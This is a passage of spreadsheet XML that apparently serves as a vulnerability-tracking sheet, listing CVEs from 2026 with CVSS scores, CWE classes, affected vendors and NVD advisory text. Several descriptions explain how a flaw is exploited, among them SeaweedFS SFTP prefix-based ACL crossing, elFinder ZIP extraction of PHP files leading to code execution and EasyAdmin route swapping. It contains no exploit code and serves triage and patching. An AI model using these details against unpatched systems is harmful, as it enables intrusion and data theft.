          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1887" s="5" t="inlineStr">
        <is>
          <t>SeaweedFS is a distributed storage system for files and blobs. In versions from 3.88 through 4.39, the SFTP server evaluates configured path permissions with a literal string-prefix comparison, so a user scoped to a path is also granted the same access to any sibling path whose name merely begins with the same characters. A user granted access to /tenants/alice therefore also matches /tenants/alice-archive, /tenants/alice2, and similar siblings, because the check does not require a path-component boundary. An authenticated low-privilege SFTP user with a root home directory and narrow path permissions can thereby cross the configured ACL boundary to read another tenant's files, and to overwrite them if granted write, all through the documented SFTP service with its own valid credentials. This issue is fixed in version 4.40.</t>
        </is>
      </c>
      <c r="M1887" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77317</t>
        </is>
      </c>
    </row>
    <row r="1888">
      <c r="A1888" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1888" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77505</t>
        </is>
      </c>
      <c r="C1888" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1888" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1888" s="5" t="inlineStr"/>
      <c r="F1888" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1888" s="5" t="inlineStr"/>
      <c r="H1888" s="5" t="inlineStr"/>
      <c r="I1888" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1888" s="5" t="inlineStr"/>
      <c r="K1888" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1888" s="5" t="inlineStr">
        <is>
          <t>Use after free in DNS Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1888" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77505</t>
        </is>
      </c>
    </row>
    <row r="1889">
      <c r="A1889" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1889" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77567</t>
        </is>
      </c>
      <c r="C1889" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1889" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1889" s="5" t="inlineStr"/>
      <c r="F1889" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1889" s="5" t="inlineStr"/>
      <c r="H1889" s="5" t="inlineStr"/>
      <c r="I1889" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J1889" s="5" t="inlineStr"/>
      <c r="K1889" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L1889" s="5" t="inlineStr">
        <is>
          <t>Filament is a collection of full-stack components for accelerated Laravel development. Prior to versions 4.12.0 and 5.7.0, incorrect challenge-form required-field handling allows app-based multi-factor authentication to be bypassed when recovery codes are enabled. Email-based multi-factor authentication is not affected. This issue is fixed in versions 4.12.0 and 5.7.0.</t>
        </is>
      </c>
      <c r="M1889" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77567</t>
        </is>
      </c>
    </row>
    <row r="1890">
      <c r="A1890" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1890" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78444</t>
        </is>
      </c>
      <c r="C1890" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1890" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1890" s="5" t="inlineStr"/>
      <c r="F1890" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1890" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1890" s="5" t="inlineStr"/>
      <c r="I1890" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1890" s="5" t="inlineStr"/>
      <c r="K1890" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="L1890" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Failover Cluster allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1890" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78444</t>
        </is>
      </c>
    </row>
    <row r="1891">
      <c r="A1891" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1891" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78449</t>
        </is>
      </c>
      <c r="C1891" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1891" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1891" s="5" t="inlineStr"/>
      <c r="F1891" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1891" s="5" t="inlineStr"/>
      <c r="H1891" s="5" t="inlineStr"/>
      <c r="I1891" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1891" s="5" t="inlineStr"/>
      <c r="K1891" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1891" s="5" t="inlineStr">
        <is>
          <t>Use after free in Reliable Multicast Transport Driver (RMCAST) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1891" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78449</t>
        </is>
      </c>
    </row>
    <row r="1892">
      <c r="A1892" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1892" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78450</t>
        </is>
      </c>
      <c r="C1892" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1892" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1892" s="5" t="inlineStr"/>
      <c r="F1892" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1892" s="5" t="inlineStr"/>
      <c r="H1892" s="5" t="inlineStr"/>
      <c r="I1892" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1892" s="5" t="inlineStr"/>
      <c r="K1892" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1892" s="5" t="inlineStr">
        <is>
          <t>Use after free in Reliable Multicast Transport Driver (RMCAST) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1892" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78450</t>
        </is>
      </c>
    </row>
    <row r="1893">
      <c r="A1893" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1893" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78583</t>
        </is>
      </c>
      <c r="C1893" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1893" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1893" s="5" t="inlineStr"/>
      <c r="F1893" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1893" s="5" t="inlineStr">
        <is>
          <t>elasticsearch</t>
        </is>
      </c>
      <c r="H1893" s="5" t="inlineStr">
        <is>
          <t>elastic:kibana</t>
        </is>
      </c>
      <c r="I1893" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1893" s="5" t="inlineStr"/>
      <c r="K1893" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1893" s="5" t="inlineStr">
        <is>
          <t>Incorrect Authorization (CWE-863) in Kibana can lead to privilege escalation via Input Data Manipulation (CAPEC-153). Elasticsearch cluster privilege declarations originating from integration packages were not validated before being used to mint credentials for enrolled Elastic Agents. A user holding Fleet management privileges could therefore cause every Elastic Agent on a targeted policy to receive a credential carrying arbitrarily elevated Elasticsearch cluster privileges, up to and including full cluster administration.</t>
        </is>
      </c>
      <c r="M1893" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78583</t>
        </is>
      </c>
    </row>
    <row r="1894">
      <c r="A1894" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1894" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78626</t>
        </is>
      </c>
      <c r="C1894" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1894" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1894" s="5" t="inlineStr"/>
      <c r="F1894" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1894" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="H1894" s="5" t="inlineStr"/>
      <c r="I1894" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1894" s="5" t="inlineStr"/>
      <c r="K1894" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1894" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="M1894" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78626</t>
        </is>
      </c>
    </row>
    <row r="1895">
      <c r="A1895" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1895" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78839</t>
        </is>
      </c>
      <c r="C1895" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1895" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1895" s="5" t="inlineStr"/>
      <c r="F1895" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1895" s="5" t="inlineStr"/>
      <c r="H1895" s="5" t="inlineStr"/>
      <c r="I1895" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1895" s="5" t="inlineStr"/>
      <c r="K1895" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L1895" s="5" t="inlineStr">
        <is>
          <t>An arbitrary file upload vulnerability in AppNitro MachForm v30 allows attackers to execute arbitrary code via uploading a crafted .phar file.</t>
        </is>
      </c>
      <c r="M1895" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78839</t>
        </is>
      </c>
    </row>
    <row r="1896">
      <c r="A1896" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1896" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79678</t>
        </is>
      </c>
      <c r="C1896" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1896" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1896" s="5" t="inlineStr"/>
      <c r="F1896" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1896" s="5" t="inlineStr"/>
      <c r="H1896" s="5" t="inlineStr"/>
      <c r="I1896" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1896" s="5" t="inlineStr"/>
      <c r="K1896" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="L1896" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in FreeIPA's idp-add command, where insufficiently validated --organization/--base-url input reaches a constrained eval() call before the corresponding LDAP access control check is enforced. This allows any authenticated IPA principal, regardless of privilege level, to enumerate and read the environment variables of the affected server process and to cause denial of service via memory exhaustion.</t>
        </is>
      </c>
      <c r="M1896" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79678</t>
        </is>
      </c>
    </row>
    <row r="1897">
      <c r="A1897" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1897" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79746</t>
        </is>
      </c>
      <c r="C1897" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1897" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1897" s="5" t="inlineStr"/>
      <c r="F1897" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1897" s="5" t="inlineStr"/>
      <c r="H1897" s="5" t="inlineStr"/>
      <c r="I1897" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1897" s="5" t="inlineStr"/>
      <c r="K1897" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1897" s="5" t="inlineStr">
        <is>
          <t>MCPHub is a unified hub for centrally managing and dynamically orchestrating multiple MCP servers/APIs into separate endpoints with flexible routing strategies. Prior to version 1.0.31, when a bearer key with accessType: 'servers' (or 'custom') is used against a group route, isBearerKeyAllowedForRequest grants access to the entire group as long as any single server in that group appears in the key's allowedServers list — not only when every server the key is scoped to matches, and critically, without ever re-checking allowedServers again once the group-level connection is authorized. A key explicitly scoped to one specific server therefore also grants full access to every other server that happens to share a group with it, including servers the key was never authorized for. This issue has been patched in version 1.0.31.</t>
        </is>
      </c>
      <c r="M1897" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79746</t>
        </is>
      </c>
    </row>
    <row r="1898">
      <c r="A1898" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1898" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80132</t>
        </is>
      </c>
      <c r="C1898" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1898" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1898" s="5" t="inlineStr"/>
      <c r="F1898" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1898" s="5" t="inlineStr"/>
      <c r="H1898" s="5" t="inlineStr"/>
      <c r="I1898" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1898" s="5" t="inlineStr"/>
      <c r="K1898" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1898" s="5" t="inlineStr">
        <is>
          <t>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M1898" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80132</t>
        </is>
      </c>
    </row>
    <row r="1899">
      <c r="A1899" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1899" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80354</t>
        </is>
      </c>
      <c r="C1899" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1899" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1899" s="5" t="inlineStr"/>
      <c r="F1899" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1899" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H1899" s="5" t="inlineStr"/>
      <c r="I1899" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1899" s="5" t="inlineStr"/>
      <c r="K1899" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1899" s="5" t="inlineStr">
        <is>
          <t>Authorization bypass through User-Controlled key vulnerability in Apache Camel K.
An authorization vulnerability in custom resource resolution allows a tenant to reference secrets by name in the operator namespace, potentially exposing secrets belonging to other tenants or operator components.
This issue affects Apache Camel K: from 2.0.0 before 2.9.3, from 2.10.1 before 2.10.2.
Users are recommended to upgrade to version 2.9.3, 2.10.2 or 2.11.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M1899" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80354</t>
        </is>
      </c>
    </row>
    <row r="1900">
      <c r="A1900" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1900" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81268</t>
        </is>
      </c>
      <c r="C1900" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1900" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1900" s="5" t="inlineStr"/>
      <c r="F1900" s="5" t="inlineStr"/>
      <c r="G1900" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1900" s="5" t="inlineStr"/>
      <c r="I1900" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1900" s="5" t="inlineStr"/>
      <c r="K1900" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="L1900" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote authenticated attacker to execute flows and obtain sensitive information due to insufficient session expiration of API keys after user deactivation.</t>
        </is>
      </c>
      <c r="M1900" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81268</t>
        </is>
      </c>
    </row>
    <row r="1901">
      <c r="A1901" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1901" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81784</t>
        </is>
      </c>
      <c r="C1901" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1901" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1901" s="5" t="inlineStr"/>
      <c r="F1901" s="5" t="inlineStr"/>
      <c r="G1901" s="5" t="inlineStr"/>
      <c r="H1901" s="5" t="inlineStr"/>
      <c r="I1901" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1901" s="5" t="inlineStr"/>
      <c r="K1901" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L1901" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated PHP Object Injection in Wise Chat &lt;= 3.4 versions.</t>
        </is>
      </c>
      <c r="M1901" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81784</t>
        </is>
      </c>
    </row>
    <row r="1902">
      <c r="A1902" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1902" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81801</t>
        </is>
      </c>
      <c r="C1902" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1902" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1902" s="5" t="inlineStr"/>
      <c r="F1902" s="5" t="inlineStr"/>
      <c r="G1902" s="5" t="inlineStr"/>
      <c r="H1902" s="5" t="inlineStr"/>
      <c r="I1902" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1902" s="5" t="inlineStr"/>
      <c r="K1902" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1902" s="5" t="inlineStr">
        <is>
          <t>Subscriber Settings Change in WP-Stateless &lt;= 4.4.1 versions.</t>
        </is>
      </c>
      <c r="M1902" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81801</t>
        </is>
      </c>
    </row>
    <row r="1903">
      <c r="A1903" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1903" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81805</t>
        </is>
      </c>
      <c r="C1903" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1903" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1903" s="5" t="inlineStr"/>
      <c r="F1903" s="5" t="inlineStr"/>
      <c r="G1903" s="5" t="inlineStr"/>
      <c r="H1903" s="5" t="inlineStr"/>
      <c r="I1903" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1903" s="5" t="inlineStr"/>
      <c r="K1903" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="L1903" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Privilege Escalation in SiteSkite &lt;= 2.1.5 versions.</t>
        </is>
      </c>
      <c r="M1903" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81805</t>
        </is>
      </c>
    </row>
    <row r="1904">
      <c r="A1904" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1904" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81891</t>
        </is>
      </c>
      <c r="C1904" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1904" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1904" s="5" t="inlineStr"/>
      <c r="F1904" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1904" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1904" s="5" t="inlineStr"/>
      <c r="I1904" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1904" s="5" t="inlineStr"/>
      <c r="K1904" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L1904" s="5" t="inlineStr">
        <is>
          <t>elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Prior to 2.1.70, checkExtractItems() in php/elFinderVolumeDriver.class.php calls mimetypeInternalDetect() without passing the result through mimeTypeNormalize(). Because the .phtml, .phar, .php5, and .php3 extensions are absent from mime.types, the staticMimeMap entries that map them to text/x-php are not applied, and allowPutMime() permits extraction even when uploadDeny blocks text/x-php. An attacker with ZIP upload permission can extract PHP-executable files into a web-accessible files/ directory and achieve remote code execution when the server executes those extensions. This issue is fixed in version 2.1.70.</t>
        </is>
      </c>
      <c r="M1904" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81891</t>
        </is>
      </c>
    </row>
    <row r="1905">
      <c r="A1905" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1905" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81892</t>
        </is>
      </c>
      <c r="C1905" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1905" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1905" s="5" t="inlineStr"/>
      <c r="F1905" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1905" s="5" t="inlineStr"/>
      <c r="H1905" s="5" t="inlineStr"/>
      <c r="I1905" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1905" s="5" t="inlineStr"/>
      <c r="K1905" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862, CWE-863</t>
        </is>
      </c>
      <c r="L1905" s="5" t="inlineStr">
        <is>
          <t>EasyAdmin is a fast and modern admin generator for Symfony applications. From 4.0.0 until 4.29.16 and 5.5.1, EasyAdmin serves all backend requests through a single dashboard route and, for custom actions (Action::linkToRoute() and MenuItem::linkToRoute()), swaps the executed controller based on the routeName query parameter on the kernel.controller event. The swap happens after Symfony's security firewall has already evaluated access_control against the original dashboard URL, and the routeName value was not validated. As a result, a path-based access_control rule protecting the target route was never evaluated, so a low-privilege backend user who can reach a single EasyAdmin URL and knows a target route's name can execute that route's controller, bypassing the path-based rule. Only path-based protections are bypassed. Routes whose controller enforces its own authorization with #[IsGranted] or denyAccessUnlessGranted() remain protected because those checks are recomputed against the swapped-in controller. This issue is fixed in versions 4.29.16 and 5.5.1.</t>
        </is>
      </c>
      <c r="M1905" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81892</t>
        </is>
      </c>
    </row>
    <row r="1906">
      <c r="A1906" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1906" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82302</t>
        </is>
      </c>
      <c r="C1906" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1906" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1906" s="5" t="inlineStr"/>
      <c r="F1906" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1906" s="5" t="inlineStr"/>
      <c r="H1906" s="5" t="inlineStr"/>
      <c r="I1906" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1906" s="5" t="inlineStr"/>
      <c r="K1906" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1906" s="5" t="inlineStr">
        <is>
          <t>Incorrect Authorization (CWE-863) in Kibana can lead to unauthorized configuration modification via Exploiting Incorrectly Configured Access Control Security Levels (CAPEC-180).</t>
        </is>
      </c>
      <c r="M1906" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82302</t>
        </is>
      </c>
    </row>
    <row r="1907">
      <c r="A1907" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1907" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82925</t>
        </is>
      </c>
      <c r="C1907" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1907" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1907" s="5" t="inlineStr"/>
      <c r="F1907" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1907" s="5" t="inlineStr"/>
      <c r="H1907" s="5" t="inlineStr"/>
      <c r="I1907" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1907" s="5" t="inlineStr"/>
      <c r="K1907" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L1907" s="5" t="inlineStr">
        <is>
          <t>The Site Reviews WordPress plugin before 8.3.0 does not prevent request data from being deserialized, and derives the key protecting that data by padding out the site's WordPress nonce key, which makes the key publicly computable on installs where that key is absent, left at its sample value, or too short to be secret. This allows unauthenticated users to inject arbitrary PHP objects on such installs. The Site Reviews WordPress plugin before 8.3.0's own code contains no chain onward from the injected object, so how far it reaches depends on the other code present on the site.</t>
        </is>
      </c>
      <c r="M1907" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82925</t>
        </is>
      </c>
    </row>
    <row r="1908">
      <c r="A1908" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1908" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83527</t>
        </is>
      </c>
      <c r="C1908" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1908" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1908" s="5" t="inlineStr"/>
      <c r="F1908" s="5" t="n">
        <v>0.015</v>
      </c>
      <c r="G1908" s="5" t="inlineStr"/>
      <c r="H1908" s="5" t="inlineStr"/>
      <c r="I1908" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1908" s="5" t="inlineStr"/>
      <c r="K1908" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="L1908" s="5" t="inlineStr">
        <is>
          <t>An Authentication Bypass vulnerability in Sentry before R10.8.2, R10.7.3 and R10.6.4 allows a remote unauthenticated attacker to gain administrative level access.</t>
        </is>
      </c>
      <c r="M1908" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83527</t>
        </is>
      </c>
    </row>
    <row r="1909">
      <c r="A1909" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1909" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83997</t>
        </is>
      </c>
      <c r="C1909" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1909" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1909" s="5" t="inlineStr"/>
      <c r="F1909" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1909" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1909" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I1909" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1909" s="5" t="inlineStr"/>
      <c r="K1909" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1909" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Message Queuing allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1909" s="6" t="inlineStr">
        <is>
